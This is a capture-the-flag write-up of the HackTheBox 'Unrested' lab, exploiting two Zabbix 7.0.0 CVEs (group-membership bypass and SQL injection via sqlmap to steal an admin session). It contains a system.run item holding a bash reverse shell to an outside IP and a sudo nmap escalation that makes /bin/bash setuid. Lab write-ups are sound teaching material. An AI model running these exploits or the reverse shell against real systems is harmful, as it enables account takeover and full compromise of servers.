HackTheBox Unrested
Writeup for HackTheBox Unrested
HackTheBox Unrested
Machine Synopsis
Unrested is a medium difficulty Linux machine hosting a version of Zabbix. Enumerating the version of Zabbix shows that it is vulnerable to both CVE-2024-36467 (missing access controls on the user.update function within the CUser class) and CVE-2024-42327 (SQL injection in user.get function in CUser class) which is leveraged to gain user access on the target. Post-exploitation enumeration reveals that the system has a sudo misconfiguration allowing the zabbix user to execute sudo /usr/bin/nmap, an optional dependency in Zabbix servers that is leveraged to gain root access. (Source)
As is common in real life pentests, you will start the Unrested box with credentials for the following account on Zabbix: [matthew / 96qzn0h2e1k3]
Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
❯ nmap -p- --min-rate 10000 10.10.11.50
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
10050/tcp open zabbix-agent
10051/tcp open zabbix-trapper
❯ nmap -p 22,80,10050,10051 -sC -sV 10.10.11.50
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
10050/tcp open tcpwrapped
10051/tcp open ssl/zabbix-trapper?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Check out the website.
Login with the credentials provided.
Looking at the bottom of the dashboard, we notice that the server is using Zabbix 7.0.0.
Googling for zabbix 7.0.0 exploit shows us that this version is vulnerable to CVE-2024-36467 and CVE-2024-42327.
The Zabbix official advisory for CVE-2024-36467 and CVE-2024-42327 states:
CVE-2024-36467:
An authenticated user with API access (e.g.: user with default
User role), more specifically a user with access to theuser.updateAPI endpoint is enough to be able to add themselves to any group (e.g.:Zabbix Administrators), except to groups that are disabled or having restricted GUI access.CVE-2024-42327:
A non-admin user account on the Zabbix frontend with the default User role, or with any other role that gives API access can exploit this vulnerability. An SQLi exists in the
CUserclass in theaddRelatedObjectsfunction, this function is being called from theCUser.getfunction which is available for every user who has API access.
Here is official GitHub commit that tries to fix the issue.
1
❯ nmap --top-ports 1500 -sU --min-rate 10000 -n -Pn 10.10.11.50
Exploitation
To check how we can use the API calls, we can refer to the official Zabbix documentation.
Lets get an API token for ourselves.
1
2
3
4
5
6
7
8
9
10
❯ curl --request POST \
--url 'http://10.10.11.50/zabbix/api_jsonrpc.php' \
--header 'Content-Type: application/json-rpc' \
--data '{"jsonrpc":"2.0","method":"user.login","params":{"username":"matthew","password":"96qzn0h2e1k3"},"id":1}' | jq
{
"jsonrpc": "2.0",
"result": "97217e8d804c125a8f41989582c0aab5",
"id": 1
}
We can check our authentication referencing the checkAuthentication Zabbix API documentation.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
❯ curl --request POST \
--url 'http://10.10.11.50/zabbix/api_jsonrpc.php' \
--header 'Content-Type: application/json-rpc' \
--data '{
"jsonrpc": "2.0",
"method": "user.checkAuthentication",
"params": {
"sessionid": "97217e8d804c125a8f41989582c0aab5"
},
"id": 1
}' | jq
{
"jsonrpc": "2.0",
"result": {
"userid": "3",
"username": "matthew",
"name": "Matthew",
"surname": "Smith",
"url": "",
"autologin": "1",
"autologout": "0",
"lang": "en_US",
"refresh": "30s",
"theme": "default",
"attempt_failed": "0",
"attempt_ip": "",
"attempt_clock": "0",
"rows_per_page": "50",
"timezone": "system",
"roleid": "1",
"userdirectoryid": "0",
"ts_provisioned": "0",
"debug_mode": 0,
"deprovisioned": false,
"gui_access": 0,
"mfaid": 0,
"auth_type": 0,
"type": 1,
"userip": "10.10.16.23",
"sessionid": "97217e8d804c125a8f41989582c0aab5",
"secret": "3bba4c3d1d5e76052e7e0e5b5af9fe1c"
},
"id": 1
}
Our userid is 3.
CVE-2024-36467
We can update our userid by referencing the user.update Zabbix API documentation.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
❯ curl --request POST \
--url 'http://10.10.11.50/zabbix/api_jsonrpc.php' \
--header 'Content-Type: application/json-rpc' \
--data '{
"jsonrpc": "2.0",
"method": "user.update",
"params": {
"userid": "3",
"roleid": "3"
},
"id": 1, "auth": "3ee9969e90a72b7ca27d36b7c4d6f4ff"
}' | jq
{
"jsonrpc": "2.0",
"error": {
"code": -32602,
"message": "Invalid params.",
"data": "User cannot change own role."
},
"id": 1
}
Lets check the source code for CUser.php.
We can observe that there is validation checks for userid and roleid but not usergrps.
Looking at usergroup.get Zabbix API documentation, it seems that we should add ourselves to userpid 7 and userpid 11 as they belong to Zabbix administrators and Enabled debug mode groups.
1
2
3
4
5
6
7
❯ curl --request POST \
--url 'http://10.10.11.50/zabbix/api_jsonrpc.php' \
--header 'Authorization: Bearer 3ee9969e90a72b7ca27d36b7c4d6f4ff' \
--header 'Content-Type: application/json-rpc' \
--data '{"jsonrpc": "2.0", "method": "user.update", "params": {"userid": "3", "usrgrps": [{"usrgrpid":"7"},{"usrgrpid":"11"}]}, "id": 1 }' -x http://127.0.0.1:8080
{"jsonrpc":"2.0","result":{"userids":["3"]},"id":1}
Lets check if we successfully added ourselves to the group.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
❯ curl --request POST \
--url 'http://10.10.11.50/zabbix/api_jsonrpc.php' \
--header 'Authorization: Bearer 3ee9969e90a72b7ca27d36b7c4d6f4ff' \
--header 'Content-Type: application/json-rpc' \
--data '{
"jsonrpc": "2.0",
"method": "usergroup.get",
"params": {
"output": "extend",
"status": 0
},
"id": 1
}' | jq
{
"jsonrpc": "2.0",
"result": [
{
"usrgrpid": "7",
"name": "Zabbix administrators",
"gui_access": "0",
"users_status": "0",
"debug_mode": "0",
"userdirectoryid": "0",
"mfa_status": "0",
"mfaid": "0"
},
{
"usrgrpid": "11",
"name": "Enabled debug mode",
"gui_access": "0",
"users_status": "0",
"debug_mode": "1",
"userdirectoryid": "0",
"mfa_status": "0",
"mfaid": "0"
}
],
"id": 1
}
CVE-2024-42327
Lets try to change our roleid again now since we are in the Administrators group.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
❯ curl --request POST \
--url 'http://10.10.11.50/zabbix/api_jsonrpc.php' \
--header 'Content-Type: application/json-rpc' \
--data '{
"jsonrpc": "2.0",
"method": "user.update",
"params": {
"userid": "3",
"roleid": "3"
},
"id": 1, "auth": "3ee9969e90a72b7ca27d36b7c4d6f4ff"
}' | jq
{
"jsonrpc": "2.0",
"error": {
"code": -32602,
"message": "Invalid params.",
"data": "User cannot change own role.",
"debug": [
{...}
}
It looks like we are still unable to update our own role. Lets try grabbing the users information.
We can retrieve user data by referencing the user.get Zabbix API documentation.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
❯ curl --request POST \
--url 'http://10.10.11.50/zabbix/api_jsonrpc.php' \
--header 'Content-Type: application/json-rpc' \
--data '{
"jsonrpc": "2.0",
"method": "user.get",
"params": {
"output": "extend"
},
"id": 1, "auth":"3ee9969e90a72b7ca27d36b7c4d6f4ff"
}' | jq
{
"jsonrpc": "2.0",
"result": [
{
"userid": "1",
"username": "Admin",
"name": "Zabbix",
"surname": "Administrator",
"url": "",
"autologin": "1",
"autologout": "0",
"lang": "default",
"refresh": "30s",
"theme": "default",
"attempt_failed": "0",
"attempt_ip": "",
"attempt_clock": "0",
"rows_per_page": "50",
"timezone": "default",
"roleid": "3",
"userdirectoryid": "0",
"ts_provisioned": "0"
},
{
"userid": "3",
"username": "matthew",
"name": "Matthew",
"surname": "Smith",
"url": "",
"autologin": "1",
"autologout": "0",
"lang": "default",
"refresh": "30s",
"theme": "default",
"attempt_failed": "0",
"attempt_ip": "",
"attempt_clock": "0",
"rows_per_page": "50",
"timezone": "default",
"roleid": "1",
"userdirectoryid": "0",
"ts_provisioned": "0"
}
],
"id": 1
}
We can also try get the user details using more fine-tuned parameters.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
❯ curl --request POST \
--url 'http://10.10.11.50/zabbix/api_jsonrpc.php' \
--header 'Authorization: Bearer 3ee9969e90a72b7ca27d36b7c4d6f4ff' \
--header 'Content-Type: application/json-rpc' \
--data '{
"jsonrpc": "2.0",
"method": "user.get",
"params": {
"output": ["userid", "username"],
"selectRole": ["roleid", "name", "type", "readonly"]
},
"id": 1
}' -x http://127.0.0.1:8080 | jq
{
"jsonrpc": "2.0",
"result": [
{
"userid": "1",
"username": "Admin",
"role": {
"roleid": "3",
"name": "Super admin role",
"type": "3",
"readonly": "1"
}
},
{
"userid": "3",
"username": "matthew",
"role": {
"roleid": "1",
"name": "User role",
"type": "1",
"readonly": "0"
}
}
],
"id": 1
}
We save the Burp Request into a file and use sqlmap.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
❯ cat req
POST /zabbix/api_jsonrpc.php HTTP/1.1
Host: 10.10.11.50
User-Agent: curl/8.11.1
Accept: */*
Authorization: Bearer e4f75c93de2c0b6efe9626553a2e5287
Content-Type: application/json-rpc
Content-Length: 189
Connection: keep-alive
{
"jsonrpc": "2.0",
"method": "user.get",
"params": {
"output": ["userid", "username"],
"selectRole": ["roleid", "name", "type", "readonly"]
},
"id": 1
}
❯ sqlmap -r req --batch
...
sqlmap identified the following injection point(s) with a total of 348 HTTP(s) requests:
---
Parameter: JSON #5* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: {
"jsonrpc": "2.0",
"method": "user.get",
"params": {
"output": ["userid", "username"],
"selectRole": ["roleid AND (SELECT 4896 FROM (SELECT(SLEEP(5)))cNOC)", "name", "type", "readonly"]
},
"id": 1
}
---
[16:50:32] [INFO] the back-end DBMS is MySQL
...
Nice, sqlmap identified a injection point. Lets dump some data!
Note: you may need to get a new authorization token if you’re facing any errors.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
❯ sqlmap -r req --batch --dbs -t 10
...
available databases [2]:
[*] information_schema
[*] zabbix
❯ sqlmap -r req --batch -D zabbix --tables -t 10
...
Database: zabbix
[49 tables]
+----------------------------+
| conditions |
| connector_tag |
| correlation |
| dashboard_page |
| dashboard_user |
| dbversion |
| event_tag |
| graphs |
| graphs_items |
| hgset |
| host_rtdata |
| httpstep |
| images |
| item_discovery |
| item_preproc |
| item_rtdata |
| lld_macro_path |
| lld_override_opdiscover |
| lld_override_opperiod |
| lld_override_opseverity |
| lld_override_optemplate |
| maintenance_tag |
| maintenances_groups |
| media |
| media_type |
| opcommand_grp |
| problem |
| proxy_group |
| proxy_history |
| proxy_rtdata |
| report |
| report_user |
| report_usrgrp |
| script_param |
| serviceI |
| service_alarms |
| sessions |
| sysmap_element_trigger |
| sysmap_user |
| sysmap_usrgrp |
| sysmaps |
| sysmaps_element_tag |
| sysmaps_link_triggers |
| task_remote_command_result |
| token |
| user_ugset |
| userdirectory_idpgroup |
| userdirectory_ldap |
| users |
+----------------------------+
❯ sqlmap -r req --batch -D zabbix -T sessions -dump -t 10
...
Database: zabbix
Table: sessions
[2 entries]
+--------+----------------------------------+----------------------------------+----------+------------+
| userid | sessionid | secret | status | lastaccess |
+--------+----------------------------------+----------------------------------+----------+------------+
| 1 | 0d018f2a66b16a04ad619330c51a6819 | d27ac47f8657711f7efaeeaab04f434c | 0 | 1739176681 |
| 3 | 1052039f26095bea3447e109a0302d8e | d2f9ff93070d1dab47a73bb1a203f5bb | 0 | 1739178283 |
+--------+----------------------------------+----------------------------------+----------+------------+
Alternatively, can just exploit SQLi manually.
There is a sessionid 0d018f2a66b16a04ad619330c51a6819 for userid 1. This is most likely for the administrator.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
❯ curl --request POST \
--url 'http://10.10.11.50/zabbix/api_jsonrpc.php' \
--header 'Content-Type: application/json-rpc' \
--data '{
"jsonrpc": "2.0",
"method": "user.checkAuthentication",
"params": {
"sessionid": "0d018f2a66b16a04ad619330c51a6819"
},
"id": 1
}' | jq
{
"jsonrpc": "2.0",
"result": {
"userid": "1",
"username": "Admin",
"name": "Zabbix",
"surname": "Administrator",
"url": "",
"autologin": "1",
"autologout": "0",
"lang": "en_US",
"refresh": "30s",
"theme": "default",
"attempt_failed": "0",
"attempt_ip": "",
"attempt_clock": "0",
"rows_per_page": "50",
"timezone": "system",
"roleid": "3",
"userdirectoryid": "0",
"ts_provisioned": "0",
"debug_mode": 0,
"deprovisioned": false,
"gui_access": "1",
"mfaid": 0,
"auth_type": 0,
"type": 3,
"userip": "10.10.16.23",
"sessionid": "0d018f2a66b16a04ad619330c51a6819",
"secret": "d27ac47f8657711f7efaeeaab04f434c"
},
"id": 1
}
Now that we got admin session token, we have to find a way to get a reverse shell.
After some research, it was noted that Zabbix can create items that consists of system commands. Refer to item.create Zabbix API documentation.
But to create an item, we need to know the hostid and interfaceid. We can query this by referring to host.get Zabbix API documentation.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
❯ curl --request POST \
--url 'http://10.10.11.50/zabbix/api_jsonrpc.php' \
--header 'Authorization: Bearer 0d018f2a66b16a04ad619330c51a6819' \
--header 'Content-Type: application/json-rpc' \
--data '{
"jsonrpc":"2.0",
"method":"host.get",
"params":{
"output":["hostid","host"],
"selectInterfaces":["interfaceid"]
},
"id":1
}' | jq
{
"jsonrpc": "2.0",
"result": [
{
"hostid": "10084",
"host": "Zabbix server",
"interfaces": [
{
"interfaceid": "1"
}
]
}
],
"id": 1
}
❯ curl --request POST \
--url 'http://10.10.11.50/zabbix/api_jsonrpc.php' \
--header 'Authorization: Bearer 1971abfe274c29e7ed0467eec0e86ed8' \
--header 'Content-Type: application/json-rpc' \
--data '{
"jsonrpc": "2.0",
"method": "item.create",
"params": {
"name": "revshell",
"key_": "system.run[\"bash -c \\\"bash -i >& /dev/tcp/10.10.16.23/8888 0>&1\\\"\"]",
"hostid": "10084",
"type": 0,
"value_type": 1,
"delay": "1s",
"interfaceid": "1"
},
"id": 1
}' | jq
{
"jsonrpc": "2.0",
"result": {
"itemids": [
"47184"
]
},
"id": 1
}
1
2
3
4
5
6
7
8
9
❯ nc -nlvp 8888
listening on [any] 8888 ...
connect to [10.10.16.23] from (UNKNOWN) [10.10.11.50] 51066
bash: cannot set terminal process group (5432): Inappropriate ioctl for device
bash: no job control in this shell
zabbix@unrested:/$ whoami
zabbix
zabbix@unrested:/$ cat /home/matthew/user.txt
a136427136dfd9c04d95059d1ece668d
Privilege Escalation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
zabbix@unrested:/$ sudo -l
Matching Defaults entries for zabbix on unrested:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User zabbix may run the following commands on unrested:
(ALL : ALL) NOPASSWD: /usr/bin/nmap *
zabbix@unrested:/$ sudo nmap --interactive
Interactive mode is disabled for security reasons.
zabbix@unrested:/$ cat $(which nmap)
#!/bin/bash
#################################
## Restrictive nmap for Zabbix ##
#################################
# List of restricted options and corresponding error messages
declare -A RESTRICTED_OPTIONS=(
["--interactive"]="Interactive mode is disabled for security reasons."
["--script"]="Script mode is disabled for security reasons."
["-oG"]="Scan outputs in Greppable format are disabled for security reasons."
["-iL"]="File input mode is disabled for security reasons."
)
# Check if any restricted options are used
for option in "${!RESTRICTED_OPTIONS[@]}"; do
if [[ "$*" == *"$option"* ]]; then
echo "${RESTRICTED_OPTIONS[$option]}"
exit 1
fi
done
# Execute the original nmap binary with the provided arguments
exec /usr/bin/nmap.original "$@"
zabbix@unrested:/$ echo 'os.execute("chmod 4775 /bin/bash")' > /tmp/nse_main.lua
zabbix@unrested:/$ sudo /usr/bin/nmap --datadir=/tmp -sC localhost
Starting Nmap 7.80 ( https://nmap.org ) at 2025-02-10 10:03 UTC
nmap.original: nse_main.cc:619: int run_main(lua_State*): Assertion `lua_isfunction(L, -1)' failed.
bash: [5434: 2 (255)] tcsetattr: Inappropriate ioctl for device
zabbix@unrested:/$ ls -la /bin/bash
-rwsrwxr-x 1 root root 1396520 Mar 14 2024 /bin/bash
zabbix@unrested:/$ bash -p
whoami
root
cat /root/root.txt
2d40433424e2f917fae86d4bd056cb47
This post is licensed under CC BY 4.0 by the author.